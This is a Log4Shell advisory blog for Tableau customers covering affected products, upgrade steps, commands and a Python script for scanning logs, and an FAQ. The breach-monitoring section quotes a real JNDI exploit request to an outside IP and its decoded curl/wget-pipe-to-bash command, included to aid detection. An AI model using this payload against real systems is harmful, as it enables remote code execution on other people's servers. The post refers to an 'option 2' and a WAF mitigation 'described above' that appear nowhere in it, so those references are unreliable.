The Information Lab will be providing updates to this blog as we continue to work on vulnerability remediation with our customers.
(Last Updated: 20/12/2021 09:49 CET)
Overview
On December 10th, 2021, our SecOps team became aware of a zero-day Java vulnerability in Log4J2 that allows remote code execution on the host and the potential for loss of control of the system. Log4J is a Java package used in many software applications for generating log files and is also used by Tableau.
Scope of vulnerability
Any software product that runs the Log4J2 package
- In version 2.15 and up the vulnerable lookup behaviour is disabled by default, but it can still be enabled.
- In all versions below 2.15 the vulnerable lookup behaviour is enabled, and it must be manually disabled in software code if the software is not patched to version 2.15.
Impacted products
- Tableau Online
- Tableau Server
- Tableau Desktop
- Tableau Prep
- Tableau Bridge
Recommended actions
Official announcements
Please monitor official announcements from Tableau/Salesforce on this page: https://status.salesforce.com/generalmessages/826
Please review the advice in this knowledge base article.
Tableau Server: Internet facing
Your server is vulnerable if it is not patched with the December 19th upgrade. Take your server offline, install a new server instance with the latest December 19th release and restore from a safe backup (from before December 9th, or from before the first time you found log lines that indicate a breach; see below: Monitoring for breaches). Upgrade your environment immediately to the latest patch of December 19th. If you cannot update, implement option 2 to mitigate the risk.
Tableau Server: Non-internet facing
We recommend monitoring your network and discussing further risks with your security operations team. Your server is vulnerable to targeted and chained attacks if an attack can be launched from within your trusted network. Upgrade your environment immediately to the latest patch of December 19th. If you cannot update, implement option 2 to mitigate the risk.
Tableau Online
As Tableau Online is a SaaS solution we recommend monitoring the official announcements from Tableau/Salesforce on this as they will take the necessary steps to keep the environment safe.
Tableau Desktop
Upgrade your environment immediately to the latest patch of December 19th. If you cannot update, implement option 2 to mitigate the risk.
Tableau Prep
Upgrade your environment immediately to the latest patch of December 19th. If you cannot update, implement option 2 to mitigate the risk.
Tableau Bridge
Upgrade your environment immediately to the latest patch of December 19th. If you cannot update, implement option 2 to mitigate the risk.
Monitoring for breaches
Please note that we cannot guarantee that the following commands will find all breaches, as the attacks are still evolving, nor can we guarantee that every match found is malicious (they might be scans from security tools). Please consult with your security operations team for guidance.
You can scan your Tableau Server log files for potential breaches using the following commands (the Windows command lists only the names of matching files; the Linux command prints the matching lines):
Windows
findstr /S /L /M /I jndi "C:\ProgramData\Tableau\Tableau Server\data\tabsvc\logs\*.log"
Linux
grep -i 'jndi:' --include '*log' -R /var/opt/tableau/tableau_server/data/tabsvc/logs
Matching log lines will look similar to the following:
GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy4zNi4yMC4yMDk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuMzYuMjAuMjA5OjgwKXxiYXNo} HTTP/1.1
Base64 decoding the string in the above GET request reveals a genuine exploit attempt to get a bash terminal on the server:
(curl -s <ip>:5874/<ip>:80||wget -q -O- <ip>:5874/<ip>:80)|bash
Note: we have masked the actual IPs with <ip> in the decoded example above.
If you find results, we recommend shutting down the server and restoring a safe backup in a new, clean environment.
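The following script is an added example, not code from The Information Lab or Tableau. It does the same job as the findstr/grep commands above but in one cross-platform place: it matches JNDI lookup tokens case-insensitively (as findstr /I does), and for each hit it decodes the Base64 segment the sample request carries so an analyst can read the command without decoding by hand. The log lines, the 192.0.2.x addresses and the encoded command are constructed placeholders, not real indicators.

```python
import base64
import binascii
import re
from pathlib import Path
from typing import Optional

# Constructed sample log lines in the shape of the request shown above.
# The IPs come from the 192.0.2.0/24 documentation range and the Base64
# segment encodes the harmless string "echo constructed-sample".
SAMPLE_LOG = """\
2021-12-11 03:14:07.123 +0000 INFO GET /?x=${jndi:ldap://192.0.2.10:12344/Basic/Command/Base64/ZWNobyBjb25zdHJ1Y3RlZC1zYW1wbGU=} HTTP/1.1
2021-12-11 03:15:22.456 +0000 INFO GET /views/Sales/Overview HTTP/1.1
2021-12-11 03:16:01.789 +0000 INFO GET /?q=${JNDI:rmi://192.0.2.11:1099/a} HTTP/1.1
"""

# Case-insensitive JNDI lookup token, mirroring findstr /I on Windows.
JNDI_RE = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)
# The "/Base64/<payload>" path segment seen in the sample request above.
B64_RE = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def decode_payload(line: str) -> Optional[str]:
    """Return the decoded Base64 command segment of a line, or None if absent or invalid."""
    m = B64_RE.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_log(text: str) -> list:
    """Return (line_number, line, decoded_payload) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        if JNDI_RE.search(line):
            hits.append((n, line, decode_payload(line)))
    return hits


def scan_directory(root: str) -> dict:
    """Recursive equivalent of the commands above: map each *.log path to its hits."""
    found = {}
    for path in Path(root).rglob("*.log"):
        hits = scan_log(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            found[str(path)] = hits
    return found


if __name__ == "__main__":
    for n, line, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: {line}")
        print(f"  decoded payload: {payload!r}")
```

Point scan_directory at the Tableau log directory for your platform (the paths used in the commands above) to scan a real installation; every hit still needs review, since security scanners produce the same pattern.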
Frequently asked questions
Has The Information Lab been vulnerable?
A small number of our internal services were found to be vulnerable and we immediately restricted access until patches become available. We have investigated our services to ensure that no malicious action was taken and we have not found any indicators. We remain vigilant on our environment as always.
The Information Lab hosts Tableau Server for us on AWS – what actions are you taking?
We have advised all customers with Internet-facing servers to restrict access to those servers via IP whitelisting on the AWS firewall, until a patch becomes available. We have also enabled the AWS WAF mitigation described above.
Once a patch is released we will be coordinating an upgrade program with all our hosted customers to migrate them to the new version as soon as possible. We deploy using a blue/green approach, so we will spin up new infrastructure from scratch, restore known-good backups (taken prior to the vulnerability being made public), and decommission the existing infrastructure.
What about The Information Lab Tableau Extensions?
None of the open-source products we offer through our GitHub page, such as Tableau Extensions (KeepitFresh, ExportAll, ImageViewer) or Web Data Connectors, are affected. The hosting provider we use does not use any Java products for logging.
Tableau will release a maintenance patch with a fix – what can I do to prepare?
When a maintenance release with a fix becomes available, it is important to make sure you are in a good position to safely deploy the update in your environments. Tableau have a useful process map for Preparing for an Upgrade, and details on how to perform the upgrade itself can be found here.
How to get more support
If you purchase your Tableau or Alteryx licences from The Information Lab, you can log a support ticket using our support service. If you do not know how to contact our support services please contact your account manager.
Please note that this document will be the primary source of general information for Log4J issues, but please feel free to log a ticket if you have something specific that you would like to ask.
You can additionally raise tickets with Tableau directly using the following link: https://www.tableau.com/support/case
What about Alteryx Server?
Alteryx does not use Log4J and is therefore not vulnerable.
Further information and reading
Comprehensive Log4J resource
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
Log4J Issue Tracking
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
Log4J Issue Explained
Our friends at Interworks have published a blog on the subject
https://interworks.com/blog/2021/12/14/log4j-vulnerability-cve-2021-44228-information/
Legal Disclaimer
1. No liability for any errors or omissions
The information contained in this Blog has been provided by The Information Lab for information purposes only. This information does not constitute legal, professional or commercial advice. While every care has been taken to ensure that the content is useful and accurate, The Information Lab gives no guarantees, undertakings or warranties in this regard, and does not accept any legal liability or responsibility for the content or the accuracy of the information so provided, or, for any loss or damage caused arising directly or indirectly in connection with reliance on the use of such information. Any errors or omissions brought to the attention of The Information Lab will be corrected as soon as possible.
The information in this Blog may contain technical inaccuracies and typographical errors. The information in this Blog may be updated from time to time and may at times be out of date. The Information Lab accepts no responsibility for keeping the information in this website up to date or any liability whatsoever for any failure to do so.
2. Material on this blog does not constitute legal and/or professional advice
Any views, opinions and guidance set out in this website are provided for information purposes only, and do not purport to be legal and/or professional advice or a definitive interpretation of any law. Anyone contemplating action in respect of matters set out in this website should obtain advice from a suitably qualified professional adviser based on their unique requirements.
3. No Warranty or Endorsement
The Information Lab does not make any warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, nor does it assume any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, nor does it represent that its use would not infringe privately owned rights.
4. No responsibility for other websites
When you access other external websites through a link from the website of The Information Lab, please note that The Information Lab has no control over the content on external websites. The links to external websites are provided as a matter of convenience only, and should not be taken as an endorsement by The Information Lab of the contents or practices of those external websites, for which The Information Lab assumes no responsibility or liability.